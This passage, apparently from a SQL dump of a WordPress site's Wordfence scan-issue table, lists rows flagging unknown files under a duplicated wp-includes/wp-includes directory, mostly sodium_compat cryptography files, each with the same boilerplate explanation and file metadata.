target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:59:\"wp-includes/wp-includes/sodium_compat/src/Core/XSalsa20.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(78084,1675048871,1675048871,'new','knownfile',75,'8eb0c2c28fdb8a4c128dff4b10c49afd','758c918c2916de88352b64a9e48613bc','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Core32/BLAKE2b.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:60:\"wp-includes/wp-includes/sodium_compat/src/Core32/BLAKE2b.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(78085,1675048871,1675048871,'new','knownfile',75,'b76c9c5b29f2628f40510f421ec7c6f5','37c7d957541d3e48a19c8cd54e0d7500','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Core32/ChaCha20/Ctx.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:65:\"wp-includes/wp-includes/sodium_compat/src/Core32/ChaCha20/Ctx.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(78086,1675048871,1675048871,'new','knownfile',75,'62d70c8a8d07c38f605df696a6b372d7','baf4769c867d450f75cb6f7d5034db97','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Core32/ChaCha20/IetfCtx.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:69:\"wp-includes/wp-includes/sodium_compat/src/Core32/ChaCha20/IetfCtx.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(78087,1675048871,1675048871,'new','knownfile',75,'15f7b9e79260e1fe5a2988fbf077a030','02385d943d5f857a1976beca8e99847f','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Core32/ChaCha20.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:61:\"wp-includes/wp-includes/sodium_compat/src/Core32/ChaCha20.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(78088,1675048871,1675048871,'new','knownfile',75,'0ded22492ab010af6d6ca9f74a50d40d','4a69953e7c1e3575a79c34af4a8aef58','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Core32/Curve25519/Fe.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:66:\"wp-includes/wp-includes/sodium_compat/src/Core32/Curve25519/Fe.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(78089,1675048871,1675048871,'new','knownfile',75,'60714a7a464ab61e5ba9f5008a9f0eb0','b6c54160be7da60c5a64e2db667735d2','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Core32/Curve25519/Ge/Cached.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:73:\"wp-includes/wp-includes/sodium_compat/src/Core32/Curve25519/Ge/Cached.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(78090,1675048871,1675048871,'new','knownfile',75,'34db436e2fb6466a78bb435c279d6c48','b1db6f640c6d7189f8e064bc31991964','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Core32/Curve25519/Ge/P1p1.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:71:\"wp-includes/wp-includes/sodium_compat/src/Core32/Curve25519/Ge/P1p1.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(78091,1675048871,1675048871,'new','knownfile',75,'400794c311670e6e696ee8ecd3cc1917','1dc02e20955bb77f90aa0b0e770eb321','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Core32/Curve25519/Ge/P2.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:69:\"wp-includes/wp-includes/sodium_compat/src/Core32/Curve25519/Ge/P2.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(78092,1675048871,1675048871,'new','knownfile',75,'fe41a2b0faab6567002b373d98539a0a','b462cd7823fda33dcdfaab3f706531e0','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Core32/Curve25519/Ge/P3.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:69:\"wp-includes/wp-includes/sodium_compat/src/Core32/Curve25519/Ge/P3.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(78093,1675048871,1675048871,'new','knownfile',75,'94419a4e0f8b7bf48f361ec239d01850','cf53bbd039d3bfaa3574da91fe1d14a4','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Core32/Curve25519/Ge/Precomp.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:74:\"wp-includes/wp-includes/sodium_compat/src/Core32/Curve25519/Ge/Precomp.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(78094,1675048871,1675048871,'new','knownfile',75,'6e446275e173ed1840ca612e6cb9c866','7d7460ef65637adde6a184eb55d4a4b5','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Core32/Curve25519/H.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:65:\"wp-includes/wp-includes/sodium_compat/src/Core32/Curve25519/H.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(78095,1675048871,1675048871,'new','knownfile',75,'2580c54fd72673c9952eba20341148f0','f0d3b7019796207c6b9dd58ae151824d','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Core32/Curve25519/README.md','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:69:\"wp-includes/wp-includes/sodium_compat/src/Core32/Curve25519/README.md\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(78096,1675048871,1675048871,'new','knownfile',75,'5e3d37efb36f0f74db0e1dca53cbea2e','77f254edfefafd88ebcf0c55ea0c1e7f','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Core32/Curve25519.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:63:\"wp-includes/wp-includes/sodium_compat/src/Core32/Curve25519.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(78097,1675048871,1675048871,'new','knownfile',75,'f93ceeb9e8c1fec867d6d24508b0451c','a2f78206f975c4b0b53f9577805baebd','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Core32/Ed25519.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:60:\"wp-includes/wp-includes/sodium_compat/src/Core32/Ed25519.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(78098,1675048871,1675048871,'new','knownfile',75,'3051fd827b8a1a97ca4e638f9623b4f2','60e1f3c9eecf1179424954ec485834da','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Core32/HChaCha20.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:62:\"wp-includes/wp-includes/sodium_compat/src/Core32/HChaCha20.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(78099,1675048871,1675048871,'new','knownfile',75,'c01002e8a54959ceac2c93650827ba3f','5b4f89d93d55fa66b0e032cc4a0f49a6','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Core32/HSalsa20.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:61:\"wp-includes/wp-includes/sodium_compat/src/Core32/HSalsa20.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(78100,1675048871,1675048871,'new','knownfile',75,'414123b260588254ff4663cbcb772245','05c21a2fea8738bca8f787d4e891114e','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Core32/Int32.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:58:\"wp-includes/wp-includes/sodium_compat/src/Core32/Int32.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(78101,1675048871,1675048871,'new','knownfile',75,'a9cf847c5cb3be580a83a226a224f108','9ac01d0b1b54c210895887ba365656fe','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Core32/Int64.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:58:\"wp-includes/wp-includes/sodium_compat/src/Core32/Int64.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(78102,1675048872,1675048872,'new','knownfile',75,'622e6112c4837ac1c5363a35b59b7233','4cea3965801d41425c0f3b0220c7590b','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Core32/Poly1305/State.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:67:\"wp-includes/wp-includes/sodium_compat/src/Core32/Poly1305/State.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(78103,1675048872,1675048872,'new','knownfile',75,'035893ec5a2997350e53a09dd52ad37c','50e44f6c4c178a5087f85fd5fba3545f','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Core32/Poly1305.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:61:\"wp-includes/wp-includes/sodium_compat/src/Core32/Poly1305.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(78104,1675048872,1675048872,'new','knownfile',75,'821778629042c1e533fc4d3b4ddb3092','d09263905d6e5f02370a8641223998b9','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Core32/Salsa20.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:60:\"wp-includes/wp-includes/sodium_compat/src/Core32/Salsa20.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(78105,1675048872,1675048872,'new','knownfile',75,'a1e38a029962af675fb672c31480d6cc','563b7ce4fcb795f9a7376b482619f747','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Core32/SecretStream/State.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:71:\"wp-includes/wp-includes/sodium_compat/src/Core32/SecretStream/State.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(78106,1675048872,1675048872,'new','knownfile',75,'25736c0ae1a97a5d6346cbc4a1fdb547','5df168570630d1c957472a721492d592','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Core32/SipHash.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:60:\"wp-includes/wp-includes/sodium_compat/src/Core32/SipHash.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(78107,1675048872,1675048872,'new','knownfile',75,'3b43cd54394309e938f3c9f309956370','964fbd1d63e9337173cfd08503b01745','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Core32/Util.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:57:\"wp-includes/wp-includes/sodium_compat/src/Core32/Util.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(78108,1675048872,1675048872,'new','knownfile',75,'ccdbc4002156b080aaff7070e71c4280','f958cb00444c2220017139993b34c317','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Core32/X25519.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:59:\"wp-includes/wp-includes/sodium_compat/src/Core32/X25519.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(78109,1675048872,1675048872,'new','knownfile',75,'60472b312239dc36baf7d2f4cb6fd25f','bcdac32ecd65c4a7a17e43d3300fcfb8','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Core32/XChaCha20.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:62:\"wp-includes/wp-includes/sodium_compat/src/Core32/XChaCha20.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(78110,1675048872,1675048872,'new','knownfile',75,'a8f454abde3d33e60cbaaaf28c15d74a','a14f74187c0049da59e4dc5e29ff7a3e','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Core32/XSalsa20.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:61:\"wp-includes/wp-includes/sodium_compat/src/Core32/XSalsa20.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(78111,1675048872,1675048872,'new','knownfile',75,'a145ed818015a732ac343ae6e486fd90','7eff80c4cae4d3f94e20e5c69e2f38b7','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Crypto.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:52:\"wp-includes/wp-includes/sodium_compat/src/Crypto.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(78112,1675048872,1675048872,'new','knownfile',75,'2fda5c790c5f2e243fdba418ec2aafd3','671458811ca55ada8c68214ef84126a7','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Crypto32.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:54:\"wp-includes/wp-includes/sodium_compat/src/Crypto32.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(78113,1675048872,1675048872,'new','knownfile',75,'338805946e3069a258cb962c01d11889','1684b3fb0b870345bd45a9313379306d','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/File.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:50:\"wp-includes/wp-includes/sodium_compat/src/File.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(78114,1675048872,1675048872,'new','knownfile',75,'0a8342e75b9545f4d31fbe4e7ebb684d','523f32b05f684acab7421b62d75fcd58','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/PHP52/SplFixedArray.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:65:\"wp-includes/wp-includes/sodium_compat/src/PHP52/SplFixedArray.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(78115,1675048872,1675048872,'new','knownfile',75,'c496a292944abff6405981e65d5fc306','78bfa79d41c905ab288d2c7b61f5a469','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/SodiumException.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:61:\"wp-includes/wp-includes/sodium_compat/src/SodiumException.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(78116,1675048872,1675048872,'new','knownfile',75,'4c6c89ec2447104b1072e9b5a30d46e5','765bc22e689eb8f36895414cceb955c0','Unknown file in WordPress core: wp-includes/wp-includes/spl-autoload-compat.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:47:\"wp-includes/wp-includes/spl-autoload-compat.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(78117,1675048872,1675048872,'new','knownfile',75,'f5916775e0ffff562b4b27d1c675fc0f','c1bf86a375b8e03a354a18f266fc90a4','Unknown file in WordPress core: wp-includes/wp-includes/taxonomy.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:36:\"wp-includes/wp-includes/taxonomy.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(78118,1675048872,1675048872,'new','knownfile',75,'6ecc8dc5eec9890ed3723c23bfe502de','84448ec82eb5039f8fe1d5fe92234fc3','Unknown file in WordPress core: wp-includes/wp-includes/template-loader.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:43:\"wp-includes/wp-includes/template-loader.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(78119,1675048872,1675048872,'new','knownfile',75,'52e793768eee5f73b8b5359f91260a58','1065f87808e9b29bc585e059481160af','Unknown file in WordPress core: wp-includes/wp-includes/template.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new 